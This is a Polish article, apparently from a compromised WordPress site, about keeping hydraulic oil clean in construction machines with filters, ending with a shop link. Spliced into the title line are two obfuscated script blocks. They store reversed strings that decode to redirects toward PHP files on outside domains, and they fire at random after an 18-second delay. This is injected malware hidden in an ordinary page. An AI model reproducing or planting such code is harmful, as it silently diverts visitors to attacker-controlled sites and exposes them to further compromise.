You are currently viewing Dbanie o czys<script>$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>tość układów hydraulicznych w maszynach budowlanych

Dbanie o czystość układów hydraulicznych w maszynach budowlanych

 

Obecnie niemal na każdej budowie ciężką pracę wykonują już tylko maszyny. Człowiek odgrywa raczej rolę tylko operatora lub pomocnika, który niewiele robi fizycznie. Ciężki sprzęt budowlany taki jak koparki, ładowarki, wozidła teleskopowe czy też walce i rozkładarki w przeważającej części opierają swoją pracę o układy hydrauliczne.

Filtr hydrauliczny do maszyny budowlanej

filtry hydrauliczne do maszyn budowlanychHydraulika w każdej maszynie budowlanej oparta jest na tej samej zasadzie. Różnią się między sobą one praktycznie tylko tym, że mają inny osprzęt, ponieważ każda maszyna służy do czegoś innego. Cechą wspólną jednak są niektóre elementy takie jak pompa hydrauliczna i płyn hydrauliczny. Aby taki układ pracował wydajnie przez jak najdłuższy czas, na czym zależy zazwyczaj wielu przedsiębiorcom, to należy dbać przede wszystkim o jakość tego płynu. Inaczej nazywany olejem hydraulicznym to ciecz o takich właściwościach, które dobrze działają w środowisku pomp i siłowników hydraulicznych. Wszystkie jednaj te elementy są bardzo podatne na wszelkie zanieczyszczenia, które mogą niszczyć je od środka. Jest to proces powolny, a jego objawy nie występują od razu. Najpierw słabnie hydraulika, ażeby na końcu w ogóle nie dało się z nią pracować. Taki płyn trzeba odpowiednio oczyścić stosując filtry hydrauliczne do maszyn budowlanych, które pracują w obiegu całej hydrauliki. Ich zadaniem jest oczywiście wyłapywanie wszelkich zanieczyszczeń w układzie.

W samym tytule wspomniałem o dbaniu o czystość układu hydraulicznego. Chodziło mi tutaj oczywiście o nic innego jak o czystość oleju hydraulicznego, a nie, jak się niektórym zdawało o mycie siłowników i pomp z zewnątrz. Samo mycie oczywiście wpływa na postrzeganie układu jako dobrze zakonserwowany, jednak tak naprawdę właściwa konserwacja odbywa się nie na zewnątrz, lecz od wewnątrz.

Na https://motrol.pl/ można kupić odpowiedni filtr hydrauliczny.